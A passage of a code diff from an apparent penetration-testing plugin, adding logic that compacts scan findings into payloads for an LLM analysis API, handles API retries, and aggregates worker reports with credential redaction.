method_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + + graybox_results = report.get("graybox_results") + if isinstance(graybox_results, dict): + for probe_map in graybox_results.values(): + if not isinstance(probe_map, dict): + continue + for probe_entry in probe_map.values(): + if not isinstance(probe_entry, dict): + continue + nested = probe_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + + return findings + + def _get_llm_payload_limits(self, analysis_type: str) -> dict: + return dict(_LLM_PAYLOAD_LIMITS.get(analysis_type, _LLM_PAYLOAD_LIMITS["security_assessment"])) + + def _estimate_llm_payload_size(self, payload: dict) -> int: + try: + return len(json.dumps(payload, sort_keys=True, default=str)) + except Exception: + return len(str(payload)) + + def _record_llm_payload_stats(self, job_id: str, analysis_type: str, raw_report: dict, shaped_payload: dict): + truncation = shaped_payload.get("truncation", {}) if isinstance(shaped_payload, dict) else {} + stats = { + "job_id": job_id, + "analysis_type": analysis_type, + "raw_bytes": self._estimate_llm_payload_size(raw_report), + "shaped_bytes": self._estimate_llm_payload_size(shaped_payload), + "truncation": truncation, + } + reduction = stats["raw_bytes"] - stats["shaped_bytes"] + stats["reduction_bytes"] = reduction + stats["reduction_ratio"] = round((reduction / stats["raw_bytes"]), 4) if stats["raw_bytes"] else 0.0 + self._last_llm_payload_stats = stats + self.Pd( + "LLM payload shaping stats for job {} [{}]: raw={}B shaped={}B reduction={}B ({:.1%}) truncation={}".format( + job_id, + analysis_type, + stats["raw_bytes"], + stats["shaped_bytes"], + reduction, + stats["reduction_ratio"], + truncation, + ) + ) + return stats + + @staticmethod + def _llm_finding_key(finding: dict) -> tuple: + return ( + str(finding.get("severity") or "").upper(), + 
str(finding.get("title") or "").strip().lower(), + finding.get("port"), + str(finding.get("protocol") or "").strip().lower(), + ) + + def _deduplicate_findings(self, findings: list[dict]) -> list[dict]: + deduped = [] + seen = set() + for finding in findings: + if not isinstance(finding, dict): + continue + key = self._llm_finding_key(finding) + if key in seen: + continue + seen.add(key) + deduped.append(finding) + return deduped + + def _rank_findings(self, findings: list[dict]) -> list[dict]: + def _finding_sort_key(finding): + severity = str(finding.get("severity") or "UNKNOWN").upper() + cve = 0 if (finding.get("cve_id") or finding.get("cve") or "CVE-" in str(finding.get("title") or "").upper()) else 1 + port = finding.get("port") + try: + port = int(port) + except (TypeError, ValueError): + port = 0 + return ( + _LLM_SEVERITY_ORDER.get(severity, _LLM_SEVERITY_ORDER["UNKNOWN"]), + cve, + -port, + str(finding.get("title") or ""), + ) + + return sorted(findings, key=_finding_sort_key) + + def _build_llm_metadata(self, job_id: str, target: str, scan_type: str, job_config: dict) -> dict: + metadata = { + "job_id": job_id, + "target": target, + "scan_type": scan_type, + "run_mode": job_config.get("run_mode", RUN_MODE_SINGLEPASS), + } + if scan_type == "webapp": + metadata["target_url"] = job_config.get("target_url") + metadata["excluded_features"] = list(job_config.get("excluded_features", []) or []) + metadata["app_routes_count"] = len(job_config.get("app_routes", []) or []) + else: + metadata["start_port"] = job_config.get("start_port") + metadata["end_port"] = job_config.get("end_port") + metadata["enabled_features_count"] = len(job_config.get("enabled_features", []) or []) + return metadata + + def _build_network_service_summary(self, aggregated_report: dict, analysis_type: str) -> tuple[list[dict], dict]: + services = [] + service_info = aggregated_report.get("service_info") + if not isinstance(service_info, dict): + return services, {"included_services": 0, 
    def _build_llm_top_findings(self, aggregated_report: dict, analysis_type: str) -> tuple[list[dict], dict]:
        """Select and compact the highest-value findings for the LLM payload.

        Findings are extracted from the aggregated report, deduplicated,
        ranked, then admitted per-severity up to the ``_LLM_FINDING_BUCKETS``
        caps for *analysis_type*, with an overall cap from the payload limits.
        Text fields are trimmed to keep the payload small.

        Returns
        -------
        tuple[list[dict], dict]
            ``(compact_findings, truncation_meta)`` where the meta dict reports
            total/deduplicated/included counts and per-severity admission.
        """
        findings = self._extract_report_findings(aggregated_report)
        total_findings = len(findings)
        deduped = self._deduplicate_findings(findings)
        ranked = self._rank_findings(deduped)
        limits = self._get_llm_payload_limits(analysis_type)
        bucket_limits = _LLM_FINDING_BUCKETS.get(analysis_type, _LLM_FINDING_BUCKETS["security_assessment"])
        included_by_severity = {}
        compact = []
        for finding in ranked:
            severity = str(finding.get("severity") or "UNKNOWN").upper()
            # Severities absent from the bucket table are never included.
            allowed = bucket_limits.get(severity, 0)
            current = included_by_severity.get(severity, 0)
            if current >= allowed:
                continue
            compact.append({
                "severity": severity,
                "title": self._llm_trim_text(finding.get("title", ""), 160),
                "port": finding.get("port"),
                "protocol": finding.get("protocol"),
                "probe": finding.get("probe"),
                "cve": finding.get("cve_id") or finding.get("cve"),
                "cwe": finding.get("cwe_id"),
                "owasp": finding.get("owasp_id"),
                "evidence": self._llm_trim_text(finding.get("evidence", ""), limits["evidence_chars"]),
            })
            included_by_severity[severity] = current + 1
            # Overall cap across all severities.
            if len(compact) >= limits["findings"]:
                break
        return compact, {
            "total_findings": total_findings,
            "deduplicated_findings": len(deduped),
            "included_findings": len(compact),
            "included_by_severity": included_by_severity,
            "truncated_findings_count": max(len(deduped) - len(compact), 0),
        }
    def _build_webapp_route_summary(self, aggregated_report: dict, job_config: dict, analysis_type: str) -> dict:
        """Collect deduplicated route and form samples for a webapp scan.

        Routes come from the job config's ``app_routes`` plus any
        ``_graybox_discovery*`` entries found under the report's
        ``service_info``; forms are deduplicated by ``(action, METHOD)``.
        Samples are capped by the per-analysis-type payload limits.

        Returns
        -------
        dict
            Route/form samples, total counts, and the limits applied.
        """
        limits = self._get_llm_payload_limits(analysis_type)
        routes = []
        forms = []
        seen_routes = set()
        seen_forms = set()

        # Config-declared routes first, preserving first-seen order.
        for route in job_config.get("app_routes", []) or []:
            if not route or route in seen_routes:
                continue
            seen_routes.add(route)
            routes.append(route)

        service_info = aggregated_report.get("service_info")
        if isinstance(service_info, dict):
            for port_entry in service_info.values():
                if not isinstance(port_entry, dict):
                    continue
                for method_name, method_entry in port_entry.items():
                    if not isinstance(method_entry, dict):
                        continue
                    # Only graybox discovery entries carry routes/forms.
                    # NOTE(review): assumes discovery entries expose "routes"
                    # and "forms" lists — confirm against the graybox probes.
                    if not str(method_name).startswith("_graybox_discovery"):
                        continue
                    for route in method_entry.get("routes", []) or []:
                        if not route or route in seen_routes:
                            continue
                        seen_routes.add(route)
                        routes.append(route)
                    for form in method_entry.get("forms", []) or []:
                        if not isinstance(form, dict):
                            continue
                        form_key = (form.get("action"), str(form.get("method") or "GET").upper())
                        if form_key in seen_forms:
                            continue
                        seen_forms.add(form_key)
                        forms.append({
                            "action": form.get("action"),
                            "method": str(form.get("method") or "GET").upper(),
                        })

        route_limit = limits["services"]
        # Form sample size is clamped to the 6..12 range.
        form_limit = max(6, min(12, limits["services"]))
        return {
            "routes_sample": routes[:route_limit],
            "forms_sample": forms[:form_limit],
            "total_routes": len(routes),
            "total_forms": len(forms),
            "route_limit": route_limit,
            "form_limit": form_limit,
        }
self._get_llm_payload_limits(analysis_type) + probe_counts = {} + graybox_results = aggregated_report.get("graybox_results") + if isinstance(graybox_results, dict): + for probe_map in graybox_results.values(): + if not isinstance(probe_map, dict): + continue + for probe_name, probe_entry in probe_map.items(): + if not isinstance(probe_entry, dict): + continue + count = len([finding for finding in probe_entry.get("findings", []) if isinstance(finding, dict)]) + probe_counts[probe_name] = probe_counts.get(probe_name, 0) + count + + web_tests_info = aggregated_report.get("web_tests_info") + if isinstance(web_tests_info, dict): + for test_map in web_tests_info.values(): + if not isinstance(test_map, dict): + continue + for test_name, test_entry in test_map.items(): + if not isinstance(test_entry, dict): + continue + count = len([finding for finding in test_entry.get("findings", []) if isinstance(finding, dict)]) + probe_counts[test_name] = probe_counts.get(test_name, 0) + count + + ranked = sorted(probe_counts.items(), key=lambda item: (-item[1], item[0])) + return { + "top_probes": [ + {"probe": probe_name, "finding_count": count} + for probe_name, count in ranked[:limits["services"]] + ], + "total_probes": len(probe_counts), + } + + def _build_webapp_findings_summary(self, aggregated_report: dict) -> dict: + findings = self._deduplicate_findings(self._extract_report_findings(aggregated_report)) + severity_counts = {} + status_counts = {} + owasp_counts = {} + vulnerable_titles = [] + seen_titles = set() + + for finding in findings: + severity = str(finding.get("severity") or "UNKNOWN").upper() + status = str(finding.get("status") or "unknown").lower() + owasp = str(finding.get("owasp_id") or finding.get("owasp") or "").strip() + title = str(finding.get("title") or "").strip() + severity_counts[severity] = severity_counts.get(severity, 0) + 1 + status_counts[status] = status_counts.get(status, 0) + 1 + if owasp: + owasp_counts[owasp] = owasp_counts.get(owasp, 0) + 1 + 
if status == "vulnerable" and title and title not in seen_titles: + seen_titles.add(title) + vulnerable_titles.append(title) + + top_owasp = sorted(owasp_counts.items(), key=lambda item: (-item[1], item[0])) + return { + "total_findings": len(findings), + "by_severity": severity_counts, + "by_status": status_counts, + "top_owasp_categories": [ + {"category": category, "count": count} + for category, count in top_owasp[:6] + ], + "top_vulnerable_titles": vulnerable_titles[:8], + } + + def _build_webapp_coverage_summary(self, aggregated_report: dict, job_config: dict, analysis_type: str) -> dict: + route_summary = self._build_webapp_route_summary(aggregated_report, job_config, analysis_type) + scan_metrics = aggregated_report.get("scan_metrics") or {} + scenario_stats = aggregated_report.get("scenario_stats") or scan_metrics.get("scenario_stats") or {} + return { + "routes": route_summary, + "scan_metrics": scan_metrics, + "scenario_stats": scenario_stats, + "completed_tests": list(aggregated_report.get("completed_tests") or []), + } + + def _build_webapp_attack_surface_summary(self, aggregated_report: dict, findings_summary: dict, analysis_type: str) -> dict: + route_summary = self._build_webapp_route_summary(aggregated_report, {}, analysis_type) + return { + "route_count": route_summary["total_routes"], + "form_count": route_summary["total_forms"], + "vulnerable_scenarios": findings_summary.get("by_status", {}).get("vulnerable", 0), + "inconclusive_scenarios": findings_summary.get("by_status", {}).get("inconclusive", 0), + "top_owasp_categories": findings_summary.get("top_owasp_categories", []), + } + + def _build_llm_analysis_payload(self, job_id: str, aggregated_report: dict, job_config: dict, analysis_type: str) -> dict: + scan_type = job_config.get("scan_type", "network") + target = job_config.get("target_url") if scan_type == "webapp" else job_config.get("target", "unknown") + if scan_type != "webapp": + services, service_meta = 
self._build_network_service_summary(aggregated_report, analysis_type) + top_findings, finding_meta = self._build_llm_top_findings(aggregated_report, analysis_type) + findings_summary = self._build_llm_findings_summary(aggregated_report) + return { + "metadata": self._build_llm_metadata(job_id, target, scan_type, job_config), + "stats": { + "nr_open_ports": aggregated_report.get("nr_open_ports"), + "ports_scanned": aggregated_report.get("ports_scanned"), + "scan_metrics": aggregated_report.get("scan_metrics"), + "analysis_type": analysis_type, + }, + "services": services, + "top_findings": top_findings, + "coverage": self._build_llm_coverage_summary(aggregated_report, analysis_type), + "attack_surface": self._build_attack_surface_summary(services, findings_summary), + "truncation": { + "service_limit": self._get_llm_payload_limits(analysis_type)["services"], + "finding_limit": self._get_llm_payload_limits(analysis_type)["findings"], + **service_meta, + **finding_meta, + }, + "findings_summary": findings_summary, + } + + top_findings, finding_meta = self._build_llm_top_findings(aggregated_report, analysis_type) + findings_summary = self._build_webapp_findings_summary(aggregated_report) + probe_summary = self._build_webapp_probe_summary(aggregated_report, analysis_type) + coverage = self._build_webapp_coverage_summary(aggregated_report, job_config, analysis_type) + return { + "metadata": self._build_llm_metadata(job_id, target, scan_type, job_config), + "stats": { + "analysis_type": analysis_type, + "scan_metrics": aggregated_report.get("scan_metrics"), + "scenario_stats": aggregated_report.get("scenario_stats"), + }, + "top_findings": top_findings, + "findings_summary": findings_summary, + "probe_summary": probe_summary, + "coverage": coverage, + "attack_surface": self._build_webapp_attack_surface_summary(aggregated_report, findings_summary, analysis_type), + "truncation": { + "finding_limit": self._get_llm_payload_limits(analysis_type)["findings"], + **finding_meta, 
    def _maybe_resolve_llm_agent_from_semaphore(self):
        """
        If SEMAPHORED_KEYS is configured and LLM Agent is enabled,
        read API_IP and API_PORT from semaphore env published by
        the LLM Agent API plugin. Overrides static config values.

        Returns
        -------
        bool
            True when both host and port were resolved from the semaphore
            env and written into ``self.config_data``; False otherwise
            (disabled, no semaphored keys, semaphore not ready, or env
            missing the address fields).
        """
        llm_cfg = self._get_llm_agent_config()
        if not llm_cfg["ENABLED"]:
            return False
        semaphored_keys = getattr(self, 'cfg_semaphored_keys', None)
        if not semaphored_keys:
            return False
        if not self.semaphore_is_ready():
            return False
        env = self.semaphore_get_env()
        if not env:
            return False
        # Accept the first populated host/port alias published by the agent.
        api_host = env.get('API_IP') or env.get('API_HOST') or env.get('HOST')
        api_port = env.get('PORT') or env.get('API_PORT')
        if api_host and api_port:
            self.P("Resolved LLM Agent API from semaphore: {}:{}".format(api_host, api_port))
            self.config_data['LLM_AGENT_API_HOST'] = api_host
            # NOTE(review): int(api_port) raises ValueError on a non-numeric
            # port value — confirm the publisher always emits integers.
            self.config_data['LLM_AGENT_API_PORT'] = int(api_port)
            return True
        return False
+ """ + host = self.cfg_llm_agent_api_host + port = self.cfg_llm_agent_api_port + endpoint = endpoint.lstrip("/") + return f"http://{host}:{port}/{endpoint}" + + def _extract_provider_http_status(self, error_details) -> int | None: + """Best-effort extraction of an upstream provider HTTP status from error details.""" + if isinstance(error_details, dict): + for key in ("status_code", "http_status", "provider_status"): + value = error_details.get(key) + if isinstance(value, int): + return value + detail = error_details.get("detail") or error_details.get("error") + if isinstance(detail, str): + return self._extract_provider_http_status(detail) + + if isinstance(error_details, str): + marker = "status " + if marker in error_details: + tail = error_details.split(marker, 1)[1] + digits = "".join(ch for ch in tail if ch.isdigit()) + if digits: + try: + return int(digits) + except ValueError: + return None + return None + + def _is_non_retryable_llm_error(self, result: dict | None) -> bool: + """Return True when an LLM/API error is permanent and retrying is wasteful.""" + if not isinstance(result, dict) or "error" not in result: + return False + + http_status = result.get("http_status") + if isinstance(http_status, int) and http_status in _NON_RETRYABLE_HTTP_STATUSES: + return True + + provider_status = result.get("provider_status") + if isinstance(provider_status, int) and provider_status in _NON_RETRYABLE_PROVIDER_STATUSES: + return True + + return result.get("status") in {"api_request_error", "provider_request_error"} + + def _call_llm_agent_api( + self, + endpoint: str, + method: str = "POST", + payload: dict = None, + timeout: int = None + ) -> dict: + """ + Make HTTP request to the LLM Agent API. + + Parameters + ---------- + endpoint : str + API endpoint to call (e.g., "/analyze_scan", "/health"). + method : str, optional + HTTP method (default: "POST"). + payload : dict, optional + JSON payload for POST requests. 
+ timeout : int, optional + Request timeout in seconds. + + Returns + ------- + dict + API response or error object. + """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + return {"error": "LLM Agent API is not enabled", "status": "disabled"} + + if not self.cfg_llm_agent_api_port: + return {"error": "LLM Agent API port not configured", "status": "config_error"} + + url = self._get_llm_agent_api_url(endpoint) + timeout = timeout or llm_cfg["TIMEOUT"] + retries = max(int(getattr(self, "cfg_llm_api_retries", 1) or 1), 1) + + def _attempt(): + self.Pd(f"Calling LLM Agent API: {method} {url}") + + if method.upper() == "GET": + response = requests.get(url, timeout=timeout) + else: + response = requests.post( + url, + json=payload or {}, + headers={"Content-Type": "application/json"}, + timeout=timeout + ) + + if response.status_code != 200: + details = response.text + try: + details = response.json() + except Exception: + pass + + result = { + "error": f"LLM Agent API returned status {response.status_code}", + "status": "api_error", + "details": details, + "http_status": response.status_code, + } + if response.status_code in _NON_RETRYABLE_HTTP_STATUSES: + result["status"] = "api_request_error" + + provider_status = self._extract_provider_http_status(details) + if provider_status is not None: + result["provider_status"] = provider_status + if provider_status in _NON_RETRYABLE_PROVIDER_STATUSES: + result["status"] = "provider_request_error" + + return { + **result, + "retryable": not self._is_non_retryable_llm_error(result), + } + + # Unwrap response if FastAPI wrapped it (extract 'result' from envelope) + response_data = response.json() + if isinstance(response_data, dict) and "result" in response_data: + return response_data["result"] + return response_data + + def _is_success(response_data): + if not isinstance(response_data, dict): + return False + if "error" not in response_data: + return True + return 
self._is_non_retryable_llm_error(response_data) + + try: + result = run_bounded_retry(self, "llm_agent_api", retries, _attempt, is_success=_is_success) + except requests.exceptions.ConnectionError: + self.P(f"LLM Agent API not reachable at {url}", color='y') + return {"error": "LLM Agent API not reachable", "status": "connection_error"} + except requests.exceptions.Timeout: + self.P("LLM Agent API request timed out", color='y') + return {"error": "LLM Agent API request timed out", "status": "timeout"} + except Exception as e: + self.P(f"Error calling LLM Agent API: {e}", color='r') + return {"error": str(e), "status": "error"} + + if isinstance(result, dict) and "error" in result: + status = result.get("status") + if status == "connection_error": + self.P(f"LLM Agent API not reachable at {url}", color='y') + elif status == "timeout": + self.P("LLM Agent API request timed out", color='y') + elif self._is_non_retryable_llm_error(result): + provider_status = result.get("provider_status") + detail = result.get("details") + suffix = f" (provider_status={provider_status})" if provider_status else "" + self.P(f"LLM Agent API request rejected{suffix}: {result.get('error')}", color='y') + if detail: + self.Pd(f"LLM Agent API rejection details: {detail}") + else: + self.P(f"LLM Agent API call failed: {result.get('error')}", color='y') + return result + return result + + def _auto_analyze_report( + self, job_id: str, report: dict, target: str, scan_type: str = "network", analysis_type: str = None, + ) -> Optional[dict]: + """ + Automatically analyze a completed scan report using LLM Agent API. + + Parameters + ---------- + job_id : str + Identifier of the completed job. + report : dict + Aggregated scan report to analyze. + target : str + Target hostname/IP that was scanned. + scan_type : str, optional + "network" or "webapp" — selects the prompt set. + + Returns + ------- + dict or None + LLM analysis result or None if disabled/failed. 
+ """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + self.Pd("LLM auto-analysis skipped (not enabled)") + return None + + self.P(f"Running LLM auto-analysis for job {job_id}, target {target} (scan_type={scan_type})...") + + analysis_result = self._call_llm_agent_api( + endpoint="/analyze_scan", + method="POST", + payload={ + "scan_results": report, + "analysis_type": analysis_type or llm_cfg["AUTO_ANALYSIS_TYPE"], + "scan_type": scan_type, + "focus_areas": None, + } + ) + + if "error" in analysis_result: + self.P(f"LLM auto-analysis failed for job {job_id}: {analysis_result.get('error')}", color='y') + else: + self.P(f"LLM auto-analysis completed for job {job_id}") + + return analysis_result + + def _collect_node_reports(self, workers: dict) -> dict: + """ + Collect individual node reports from all workers. + + Parameters + ---------- + workers : dict + Worker entries from job_specs containing report_cid or result. + + Returns + ------- + dict + Mapping {addr: report_dict} for each worker with data. + """ + all_reports = {} + + for addr, worker_entry in workers.items(): + report = None + report_cid = worker_entry.get("report_cid") + + # Try to fetch from R1FS first + if report_cid: + try: + report = self.r1fs.get_json(report_cid) + self.Pd(f"Fetched report from R1FS for worker {addr}: CID {report_cid}") + except Exception as e: + self.P(f"Failed to fetch report from R1FS for {addr}: {e}", color='y') + + # Fallback to direct result + if not report: + report = worker_entry.get("result") + + if report: + all_reports[addr] = report + + if not all_reports: + self.P("No reports found to collect", color='y') + + return all_reports + + def _run_aggregated_llm_analysis( + self, + job_id: str, + aggregated_report: dict, + job_config: dict, + ) -> str | None: + """ + Run LLM analysis on a pre-aggregated report. + + The caller aggregates once and passes the result. This method + no longer fetches node reports or saves to R1FS. 
+ + Parameters + ---------- + job_id : str + Identifier of the job. + aggregated_report : dict + Pre-aggregated scan data from all workers. + job_config : dict + Job configuration (from R1FS). + + Returns + ------- + str or None + LLM analysis markdown text if successful, None otherwise. + """ + scan_type = job_config.get("scan_type", "network") + target = job_config.get("target_url") if scan_type == "webapp" else job_config.get("target", "unknown") + self.P(f"Running aggregated LLM analysis for job {job_id}, target {target}...") + + if not aggregated_report: + self.P(f"No data to analyze for job {job_id}", color='y') + return None + + report_with_meta = self._build_llm_analysis_payload( + job_id, + aggregated_report, + job_config, + self._get_llm_agent_config()["AUTO_ANALYSIS_TYPE"], + ) + self._record_llm_payload_stats( + job_id, + self._get_llm_agent_config()["AUTO_ANALYSIS_TYPE"], + aggregated_report, + report_with_meta, + ) + + # Call LLM analysis + llm_analysis = self._auto_analyze_report(job_id, report_with_meta, target, scan_type=scan_type) + self._last_llm_analysis_status = llm_analysis.get("status") if isinstance(llm_analysis, dict) else None + + if not llm_analysis or "error" in llm_analysis: + self.P( + f"LLM analysis failed for job {job_id}: {llm_analysis.get('error') if llm_analysis else 'No response'}", + color='y' + ) + return None + + # Extract the markdown text from the analysis result + if isinstance(llm_analysis, dict): + return llm_analysis.get("content", llm_analysis.get("analysis", llm_analysis.get("markdown", str(llm_analysis)))) + return str(llm_analysis) + + def _run_quick_summary_analysis( + self, + job_id: str, + aggregated_report: dict, + job_config: dict, + ) -> str | None: + """ + Run a short (2-4 sentence) AI quick summary on a pre-aggregated report. + + The caller aggregates once and passes the result. This method + no longer fetches node reports or saves to R1FS. + + Parameters + ---------- + job_id : str + Identifier of the job. 
+ aggregated_report : dict + Pre-aggregated scan data from all workers. + job_config : dict + Job configuration (from R1FS). + + Returns + ------- + str or None + Quick summary text if successful, None otherwise. + """ + scan_type = job_config.get("scan_type", "network") + target = job_config.get("target_url") if scan_type == "webapp" else job_config.get("target", "unknown") + self.P(f"Running quick summary analysis for job {job_id}, target {target}...") + + if not aggregated_report: + self.P(f"No data for quick summary for job {job_id}", color='y') + return None + + report_with_meta = self._build_llm_analysis_payload( + job_id, + aggregated_report, + job_config, + "quick_summary", + ) + self._record_llm_payload_stats(job_id, "quick_summary", aggregated_report, report_with_meta) + + # Call LLM analysis with quick_summary type + analysis_result = self._call_llm_agent_api( + endpoint="/analyze_scan", + method="POST", + payload={ + "scan_results": report_with_meta, + "analysis_type": "quick_summary", + "scan_type": scan_type, + "focus_areas": None, + } + ) + self._last_llm_summary_status = analysis_result.get("status") if isinstance(analysis_result, dict) else None + + if not analysis_result or "error" in analysis_result: + self.P( + f"Quick summary failed for job {job_id}: {analysis_result.get('error') if analysis_result else 'No response'}", + color='y' + ) + return None + + # Extract the summary text from the result + if isinstance(analysis_result, dict): + return analysis_result.get("content", analysis_result.get("summary", analysis_result.get("analysis", str(analysis_result)))) + return str(analysis_result) + + def _get_llm_health_status(self) -> dict: + """ + Check health of the LLM Agent API connection. + + Returns + ------- + dict + Health status of the LLM Agent API. 
+ """ + llm_cfg = self._get_llm_agent_config() + if not llm_cfg["ENABLED"]: + return { + "enabled": False, + "status": "disabled", + "message": "LLM Agent API integration is disabled", + } + + if not self.cfg_llm_agent_api_port: + return { + "enabled": True, + "status": "config_error", + "message": "LLM Agent API port not configured", + } + + result = self._call_llm_agent_api(endpoint="/health", method="GET", timeout=5) + + if "error" in result: + return { + "enabled": True, + "status": result.get("status", "error"), + "message": result.get("error"), + "host": self.cfg_llm_agent_api_host, + "port": self.cfg_llm_agent_api_port, + } + + return { + "enabled": True, + "status": "ok", + "host": self.cfg_llm_agent_api_host, + "port": self.cfg_llm_agent_api_port, + "llm_agent_health": result, + } diff --git a/extensions/business/cybersec/red_mesh/mixins/report.py b/extensions/business/cybersec/red_mesh/mixins/report.py new file mode 100644 index 00000000..db60db6d --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/report.py @@ -0,0 +1,426 @@ +""" +Report aggregation mixin for RedMesh pentester API. + +Handles merging worker results, credential redaction, and pre-computing +the UI aggregate view for the frontend. 
+""" + +from ..worker import PentestLocalWorker +from ..models import UiAggregate + + +class _ReportMixin: + """Report aggregation and UI view methods for PentesterApi01Plugin.""" + + SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} + CONFIDENCE_ORDER = {"certain": 0, "firm": 1, "tentative": 2} + + @staticmethod + def _count_nested_findings(section): + """Count findings in a nested {port: {probe: {findings: []}}} section.""" + total = 0 + for per_port in (section or {}).values(): + if not isinstance(per_port, dict): + continue + for per_probe in per_port.values(): + if isinstance(per_probe, dict): + total += len(per_probe.get("findings", [])) + return total + + def _count_all_findings(self, report): + """Count all findings emitted by network and graybox reporting sections.""" + if not isinstance(report, dict): + return 0 + return ( + self._count_nested_findings(report.get("service_info")) + + self._count_nested_findings(report.get("web_tests_info")) + + len(report.get("correlation_findings") or []) + + self._count_nested_findings(report.get("graybox_results")) + ) + + @staticmethod + def _dedupe_items(items): + """Deduplicate mixed scalar/dict items while preserving first-seen order.""" + import json as _json + + deduped = [] + seen = set() + for item in items: + try: + key = _json.dumps(item, sort_keys=True, default=str) + except (TypeError, ValueError): + key = str(item) + if key in seen: + continue + seen.add(key) + deduped.append(item) + return deduped + + def _extract_graybox_ui_stats(self, aggregated, latest_pass=None): + """Extract graybox-specific archive summary values from aggregated data.""" + latest_pass = latest_pass or {} + scan_metrics = latest_pass.get("scan_metrics") or {} + + service_info = aggregated.get("service_info") or {} + graybox_results = aggregated.get("graybox_results") or {} + + routes = [] + forms = [] + for methods in service_info.values(): + if not isinstance(methods, dict): + continue + discovery = 
methods.get("_graybox_discovery") + if not isinstance(discovery, dict): + continue + routes.extend(discovery.get("routes") or []) + forms.extend(discovery.get("forms") or []) + + scenario_total = 0 + scenario_vulnerable = 0 + for probes in graybox_results.values(): + if not isinstance(probes, dict): + continue + for probe_data in probes.values(): + if not isinstance(probe_data, dict): + continue + for finding in probe_data.get("findings", []): + if not isinstance(finding, dict): + continue + status = finding.get("status") + if not status: + continue + scenario_total += 1 + if status == "vulnerable": + scenario_vulnerable += 1 + + if scan_metrics: + scenario_total = max(scenario_total, scan_metrics.get("scenarios_total", 0) or 0) + scenario_vulnerable = max( + scenario_vulnerable, + scan_metrics.get("scenarios_vulnerable", 0) or 0, + ) + + return { + "total_routes_discovered": len(self._dedupe_items(routes)), + "total_forms_discovered": len(self._dedupe_items(forms)), + "total_scenarios": scenario_total, + "total_scenarios_vulnerable": scenario_vulnerable, + } + + def _get_aggregated_report(self, local_jobs, worker_cls=None): + """ + Aggregate results from multiple local workers. + + Parameters + ---------- + local_jobs : dict + Mapping of worker id to result dicts. + worker_cls : type, optional + Worker class to resolve aggregation fields from. Defaults to + PentestLocalWorker for backward compat. + + Returns + ------- + dict + Aggregated report with merged open ports, service info, etc. 
+ """ + dct_aggregated_report = {} + type_or_func, field = None, None + try: + if local_jobs: + self.P(f"Aggregating reports from {len(local_jobs)} local jobs...") + for local_worker_id, local_job_status in local_jobs.items(): + if worker_cls and hasattr(worker_cls, 'get_worker_specific_result_fields'): + aggregation_fields = worker_cls.get_worker_specific_result_fields() + else: + aggregation_fields = PentestLocalWorker.get_worker_specific_result_fields() + for field in local_job_status: + if field not in dct_aggregated_report: + dct_aggregated_report[field] = local_job_status[field] + elif field in aggregation_fields: + type_or_func = aggregation_fields[field] + if field not in dct_aggregated_report: + field_type = type(local_job_status[field]) + dct_aggregated_report[field] = field_type() + #endif + if isinstance(dct_aggregated_report[field], list): + existing = set(dct_aggregated_report[field]) + merged = existing.union(local_job_status[field]) + try: + dct_aggregated_report[field] = sorted(merged) + except TypeError: + dct_aggregated_report[field] = list(merged) + elif isinstance(dct_aggregated_report[field], dict): + dct_aggregated_report[field] = self.merge_objects_deep( + dct_aggregated_report[field], + local_job_status[field]) + else: + _existing = dct_aggregated_report[field] + _new = local_job_status[field] + dct_aggregated_report[field] = type_or_func([_existing, _new]) + # end if aggregation type + # end if standard (one time) or aggregated fields + # for each field in this local job + # for each local job + self.P(f"Report aggregation done.") + # endif we have local jobs + except Exception as exc: + self.P("Error during report aggregation: {}:\n{}\n{}\ntype_or_func={}, field={}".format( + exc, self.trace_info(), + self.json_dumps(dct_aggregated_report, indent=2), + type_or_func, field + )) + return dct_aggregated_report + + def merge_objects_deep(self, obj_a, obj_b): + """ + Deeply merge two objects (dicts, lists, sets). 
+ + Parameters + ---------- + obj_a : Any + First object. + obj_b : Any + Second object. + + Returns + ------- + Any + Merged object. + """ + if isinstance(obj_a, dict) and isinstance(obj_b, dict): + merged = dict(obj_a) + for key, value_b in obj_b.items(): + if key in merged: + merged[key] = self.merge_objects_deep(merged[key], value_b) + else: + merged[key] = value_b + return merged + elif isinstance(obj_a, list) and isinstance(obj_b, list): + try: + return list(set(obj_a).union(set(obj_b))) + except TypeError: + import json as _json + seen = set() + merged = [] + for item in obj_a + obj_b: + try: + key = _json.dumps(item, sort_keys=True, default=str) + except (TypeError, ValueError): + key = id(item) + if key not in seen: + seen.add(key) + merged.append(item) + return merged + elif isinstance(obj_a, set) and isinstance(obj_b, set): + return obj_a.union(obj_b) + else: + return obj_b # Prefer obj_b in case of conflict + + def _redact_report(self, report): + """ + Redact credentials from a report before persistence. + + Deep-copies the report and masks password values in findings and + accepted_credentials lists so that sensitive data is not written + to R1FS or CStore. + + Parameters + ---------- + report : dict + Aggregated scan report. + + Returns + ------- + dict + Redacted copy of the report. 
+ """ + import re as _re + from copy import deepcopy + redacted = deepcopy(report) + service_info = redacted.get("service_info", {}) + for port_key, methods in service_info.items(): + if not isinstance(methods, dict): + continue + for method_key, method_data in methods.items(): + if not isinstance(method_data, dict): + continue + # Redact findings evidence + for finding in method_data.get("findings", []): + if not isinstance(finding, dict): + continue + evidence = finding.get("evidence", "") + if isinstance(evidence, str): + evidence = _re.sub( + r'(Accepted credential:\s*\S+?):(\S+)', + r'\1:***', evidence + ) + evidence = _re.sub( + r'(Accepted random creds\s*\S+?):(\S+)', + r'\1:***', evidence + ) + finding["evidence"] = evidence + # Redact accepted_credentials lists + creds = method_data.get("accepted_credentials", []) + if isinstance(creds, list): + method_data["accepted_credentials"] = [ + _re.sub(r'^(\S+?):(.+)$', r'\1:***', c) if isinstance(c, str) else c + for c in creds + ] + # Redact graybox_results credential evidence + _CRED_RE = _re.compile(r'(\S+?):(\S+)') + _PASSWORD_RE = _re.compile(r'((?:password|passwd|pwd)["\']?\s*[:=]\s*)(["\']?)[^\s"\'&]+', _re.I) + + def _redact_graybox_text(value): + if not isinstance(value, str): + return value + value = _CRED_RE.sub(r'\1:***', value) + value = _PASSWORD_RE.sub(r'\1\2***', value) + return value + + graybox_results = redacted.get("graybox_results", {}) + for port_key, probes in graybox_results.items(): + if not isinstance(probes, dict): + continue + for probe_name, 